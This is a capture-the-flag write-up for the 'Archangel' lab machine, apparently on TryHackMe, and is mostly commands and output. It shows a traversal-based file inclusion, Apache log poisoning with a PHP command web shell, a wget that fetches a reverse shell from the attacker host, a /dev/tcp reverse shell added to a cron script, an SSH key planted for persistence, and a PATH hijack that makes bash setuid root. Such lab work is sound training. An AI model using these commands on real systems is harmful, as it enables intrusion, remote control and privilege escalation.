Archangel

Writeup.

Get a shell

1. Find a different hostname

mafialive.thm

2. Find flag 1

  • Add the domain name to /etc/hosts as : 10.10.224.98 mafialive.thm

3. Look for a page under development

test.php

4. Find flag 2

thm{explo1t1ng_lf1}

5. Get user shell & flag.

  • The hint said poison!!.

  • apache log poison it is!!!! (google search)

Url poisioning

  • i used following curl command for the log poision

└─➜ curl "http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log" -H "User-Agent: <?php system(\$_GET['cmd']) ?>"    

Log poison sucessfull !!

Reverse shell

  • I used pentest monkey's revshell

  • Start a python server in your local system & run the following command :

  • make sure you change ip & port

└─➜ curl "http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=wget+YOUR_IP:PORT/revshell.php" #-H
  • so i copied the .php file into machines using wget

  • & now when i visit MACHINE_IP/revshell.php i will get a reverse shell

Flag

┌─[ ~/stuff/thm/archangel] [ 10.8.102.180]
└─➜ nc -nvlp 9001                                                                                   [0]
Connection from 10.10.1.211:59838
Linux ubuntu 4.15.0-123-generic #126-Ubuntu SMP Wed Oct 21 09:40:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 15:03:46 up  1:03,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cat /home/archangel/user.txt
<REDACTED>

Root the machine

1. Get user 2 flag

  • There's a cronjob running the file in /opt (found through Linpeas)

  • we have full write access on it, so let's edit it & get a stable shell

  • I am going to add my public key into the authorized keys of archangel.

  • get archangel shell

www-data@ubuntu:/opt$ echo "sh -i >& /dev/tcp/10.8.102.180/9099 0>&1" >> helloworld.sh
  • And we got the shelll

└─➜ nc -nvlp 9099                                                                                                                                                                                             [0]
Connection from 10.10.1.211:41092
sh: 0: can't access tty; job control turned off
$ id
uid=1001(archangel) gid=1001(archangel) groups=1001(archangel)

----------stabalize shell

└─➜ cat ssh.sh                                                                                                                                                                                                [0]
#!/bin/sh
#

mkdir ~/.ssh
chmod 700 ~/.ssh

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC18sGRBGlzuvZK0Koh9FX0TprCBJHe4H/piBsY6a66JaHHaCTAN73A1Sp1gQUEQRZrYBh1d59mHeEUK5IIlD+4slmQTs29mfkmYisTRWKzxyxdaCOrGaphdnVxFyPO4XP86DJQ2ejB/nQiiCsxa9CqVQix/m1C11cbuferNdkLezLWkP2O3VTeFswATTQaScSXu/hSHw3WoXOr1yS3Ceofmf5r1NvEZQC45eEqxa0ACiFBZY75A1EsDIYhsvpNeqbMtjLKq3GoA9TO6HnujGIjFgq5El9fMVDC9bxwNCTKXcvlv3YYKAJqY/fOs2EUj/nqwOj/ynXsTOY5vWM9MIvYtTra32IM1z6OpWKLPUOjJ22W8l6y+XfRfF6TGRNIes0mgclzdjWC9MHqiPGm68hQgF3Zm5PNBtP7n3j3UYzkZJLT2WlOff8osIGMIkROmlbnHxQR6mURgVBU5k+vH/P+iB9zLurB16ptI5vWEXoj6iz6p8Ip+0+sn/0a9hFWyPq9dPbUaRuHA1/Blyh6/7DA3JeOQ79RfCeIZA0JEEumsLDDhfUc7x2kGiSHt0uHZjBDEBM+oZm8dFO4fOXv/7JN1rE60J2zHRMz5YXKWFGMapq3PAAPKXbYW7A5PLjQEr80yEzf38GV1hKyvHI1IdNb21f/P7I08cijowmZ6mUhxQ== heapbytes@pm.me" > ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
  • Start python server

└─➜ python3 -m http.server 1111                                                                                                                                                                             [130]
Serving HTTP on 0.0.0.0 port 1111 (http://0.0.0.0:1111/) ...
10.10.1.211 - - [17/Sep/2023 15:33:56] "GET /ssh.sh HTTP/1.1" 200 -
  • Now ssh part.

2. Root flag

 Question Hint
certain paths are dangerous
  • running the binary gives an error

cp: cannot stat '/home/user/archangel/myfiles/*': No such file or directory
  • taking note of the hint my guess is that the binary is using relative path so we can create our own cp & pwn the machine.

archangel@ubuntu:/tmp$ nano cp
archangel@ubuntu:/tmp$ cat cp
chmod +s /bin/bash
archangel@ubuntu:/tmp$ chmod 777 cp
  • i made in /tmp

  • now let's add our /tmp to our path variable

archangel@ubuntu:/tmp$ export PATH=/tmp:$PATH
archangel@ubuntu:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
archangel@ubuntu:/tmp$

--------------- ROOT FLAG

archangel@ubuntu:/tmp$ cd
archangel@ubuntu:~$ cd secret/
archangel@ubuntu:~/secret$ ./backup
archangel@ubuntu:~/secret$ /bin/bash -p

bash-4.4# id
uid=1001(archangel) gid=1001(archangel) euid=0(root) egid=0(root) groups=0(root),1001(archangel)

Last updated